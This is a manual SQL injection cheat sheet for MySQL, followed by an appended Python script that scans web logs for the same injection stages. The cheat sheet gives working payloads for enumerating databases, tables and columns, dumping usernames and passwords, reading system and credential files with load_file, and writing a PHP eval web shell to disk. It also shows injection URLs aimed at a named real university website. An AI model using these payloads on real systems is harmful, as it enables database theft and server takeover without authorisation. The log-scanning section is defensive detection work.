Finding the number of fields (columns)
ORDER BY num/*
Matching fields
and 1=1 Union Select 1,2,3,4,5.......n/*
Revealing which field positions are displayed
and 1=2 Union Select 1,2,3,4,5.....n/*
Using built-in functions to reveal database information
version() database() user()
Revealing database information without guessing a usable field (does not work on some sites):
and 1=2 union all select version()/*
and 1=2 union all select database()/*
and 1=2 union all select user()/*
Operating System Information:
and 1=2 union all select @@global.version_compile_os from mysql.user/*
Database permissions:
and ord(mid(user(),1,1))=114/* a normal response indicates the user is root
Dumping database names (MySQL > 5.0)
MySQL 5.0 and later has the built-in information_schema database, which stores the structure information of all MySQL databases and tables
and 1=2 union select 1,2,3,schema_name,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
Enumerating tables
and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.TABLES where table_schema=database name (hexadecimal) limit 0,1
(in limit 0,1 the 0 is the starting record, 0 being the first record, and the 1 means show 1 record)
Enumerating fields (columns)
and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10 from information_schema.COLUMNS where table_name=table name (hexadecimal) limit 0,1
Dumping passwords
and 1=2 union select 1,2,3,username field,5,6,7,password field,8,9 from table name limit 0,1
Advanced usage (one usable field displaying two data items):
union select 1,2,3,concat(username field,0x3c,password field),5,6,7,8,9 from table name limit 0,1
Writing a web shell directly (root privileges)
Conditions:
1. The site's physical path is known
2. Sufficient privileges (can be tested with select .... from mysql.user)
3. magic_quotes_gpc()=off
Select ' <?php eval ($_post[cmd])?> ' into outfile ' physical path '
and 1=2 union all select hex value of the one-liner into outfile 'path'
Common load_file() paths:
1. replace(load_file(0x2f6574632f706173737764),0x3c,0x20)
2. replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
The two above are for viewing the complete source code of a PHP file. Sometimes, if certain characters are not replaced (for example "<" replaced with a space), what comes back is the rendered web page and the code cannot be seen.
3. load_file(char(47)) can list the root directory on FreeBSD and SunOS systems
4. /etc/httpd/conf/httpd.conf or /usr/local/apche/conf/httpd.conf: view the Linux Apache virtual host configuration file
5. C:\Program Files\apache group\apache\conf\httpd.conf or C:\apache\conf\httpd.conf: view the Apache file on Windows systems
6. c:/resin-3.0.14/conf/resin.conf: view the Resin configuration of a website developed in JSP
7. c:/resin/conf/resin.conf, /usr/local/resin/conf/resin.conf: view the JSP virtual host configuration on Linux systems
8. d:\APACHE\Apache2\conf\httpd.conf
9. C:\Program Files\mysql\my.ini
10. ../themes/darkblue_orange/layout.inc.php: phpMyAdmin path disclosure
11. C:\windows\system32\inetsrv\MetaBase.xml: view the IIS virtual host configuration file
12. /usr/local/resin-3.0.22/conf/resin.conf: view the Resin 3.0.22 configuration file
13. /usr/local/resin-pro-3.0.22/conf/resin.conf: ditto
14. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf: view the Apache virtual hosts
15. /etc/sysconfig/iptables: view the firewall policy
16. /usr/local/app/php5 B/php.ini: PHP-related settings
17. /etc/my.cnf: MySQL configuration file
18. /etc/redhat-release: Red Hat system version
19. C:\mysql\data\mysql\user.MYD: holds the user passwords of the MySQL system
20. /etc/sysconfig/network-scripts/ifcfg-eth0: view the IP address
21. /usr/local/app/php5 B/php.ini: PHP-related settings
22. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf: virtual site settings
23. C:\Program Files\rhinosoft.com\serv-u\servudaemon.ini
24. C:\windows\my.ini
25. C:\Boot.ini
Common website configuration files: config.inc.php, config.php. With load_file(), use replace(load_file(HEX),char(60),char(32))
Note:
char(60) denotes <
char(32) denotes a space
Problems with manual injection:
When the injection page shows:
Illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation ' UNION '
for example: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433a5c626f6f742e696e69),3,4,user()%20
This is caused by inconsistent character encodings (collations).
Workaround: wrap the parameter in unhex(hex(parameter)). The URL above can be changed to:
http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433a5c626f6f742e696e69))),3,4,unhex(hex(user()))%20
The injection can then continue ...
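For defenders, each stage listed above leaves a recognizable trace in the request's query string, so a web access log can be scanned for them. The following is an added example, not part of the original page: the rule names, the combined log format and the sample log lines (documentation addresses, hypothetical item.php and search.php scripts) are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Rule names follow the stages listed on this page; the names are this example's own.
RULES = {
    "column_count_probe": re.compile(r"\border by \d+"),
    "union_select": re.compile(r"\bunion (all )?select\b"),
    "fingerprint": re.compile(r"\b(version|database|user)\(\)|@@global\.version_compile_os"),
    "schema_enumeration": re.compile(r"\binformation_schema\.(schemata|tables|columns)\b"),
    "file_read": re.compile(r"\bload_file\("),
    "file_write": re.compile(r"\binto outfile\b"),
    "collation_workaround": re.compile(r"\bunhex\(hex\("),
}
# Assumed combined/common log format: captures client address and request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')

def normalize(query):
    """Percent-decode, drop spaces around punctuation, collapse whitespace, lowercase."""
    text = unquote_plus(query)
    text = re.sub(r"\s*([().,=])\s*", r"\1", text)  # "Load_file (" -> "Load_file("
    return re.sub(r"\s+", " ", text).lower()

def scan_request(target):
    """Return the names of the rules matched by one request target."""
    text = normalize(urlsplit(target).query)
    return [name for name, rx in RULES.items() if rx.search(text)]

def scan_log(lines):
    """Map each client address to the rule names it triggered, in first-seen order."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        for name in scan_request(m.group(2)) if m else ():
            seen = hits.setdefault(m.group(1), [])
            if name not in seen:
                seen.append(name)
    return hits

# Constructed log lines for illustration; not taken from any real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /item.php?id=13 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2024:13:55:40 +0000] "GET /search.php?q=order+by+date HTTP/1.1" 200 811',
    '203.0.113.9 - - [10/Oct/2024:13:56:01 +0000] "GET /item.php?id=13%20order%20by%2010/* HTTP/1.1" 200 310',
    '203.0.113.9 - - [10/Oct/2024:13:56:09 +0000] "GET /item.php?id=13%20and%201=2%20Union%20Select%201,2,Version%20(),4/* HTTP/1.1" 200 402',
    '203.0.113.9 - - [10/Oct/2024:13:56:20 +0000] "GET /item.php?id=13%20and%201=2%20union%20select%201,2,table_name,4%20from%20INFORMATION_SCHEMA.%20TABLES%20limit%200,1 HTTP/1.1" 200 415',
    '203.0.113.9 - - [10/Oct/2024:13:56:31 +0000] "GET /item.php?id=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433a5c626f6f742e696e69))),3,4 HTTP/1.1" 200 900',
]
```

A client that moves from column_count_probe through schema_enumeration to file_read within a short window matches the manual procedure on this page; matching is a triage signal, and the fix remains parameterized queries plus a database account without the FILE privilege.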